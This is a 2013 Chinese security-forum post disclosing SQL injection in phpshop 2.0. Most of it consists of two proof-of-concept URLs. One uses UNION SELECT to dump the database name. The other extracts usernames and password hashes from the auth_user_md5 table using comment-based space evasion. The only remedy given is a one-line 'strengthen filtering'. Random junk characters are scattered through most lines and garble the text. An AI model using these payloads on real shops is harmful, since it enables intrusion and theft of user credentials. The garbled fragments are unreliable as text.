找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1948|回复: 0
打印 上一主题 下一主题

phpshop 2.0 SQL注入及修复

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-18 18:24:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
标题 : phpshop 2.0 SQL Injection Vulnerability
5 N: x2 L1 a, K% W
3 X+ m0 u9 G! d7 O1 F* C8 [& l0 q3 A- w作者 : By onestree
- t2 Z- q  W9 v: l* S下载地址 : http://code.google.com/p/phpshop/downloads/list
6 I, y  Q6 v# _  f& b5 R$ g4 `测试地址: windows 7 / ubuntu
& x% O9 F4 |" h) O$ v' W6 m & G' y9 ^2 q8 l0 U( l

! U  G; X( ^2 g5 b2 M" GSQLi p0c:
" x) T% F' G0 k & s9 [6 [4 L1 {7 c2 G: A7 p% {! Y
==================! u% `% I" p7 L+ k! G* b8 Q$ G3 y- S: X& \

% O! t7 k0 E# v1 Y' ghttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'# Z* f8 \; y. g2 h- u2 p* {
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
/ F; `( ^# T& J9 @1 E* t
9 Y  B7 d4 b5 g! ^2 A" shttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--" _/ P: q- Y! a" G% |- O

3 [" I* P  q" |7 V6 w$ w% Q修复:9 Y  N* p. R! `6 A) e
加强过滤
* Q- u: A+ m/ [2 l6 L9 N# ]) E7 h$ m, B' S$ |( F9 m4 S1 o2 T
0 N; o. n" [# ?0 s. b* `- ^- Z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表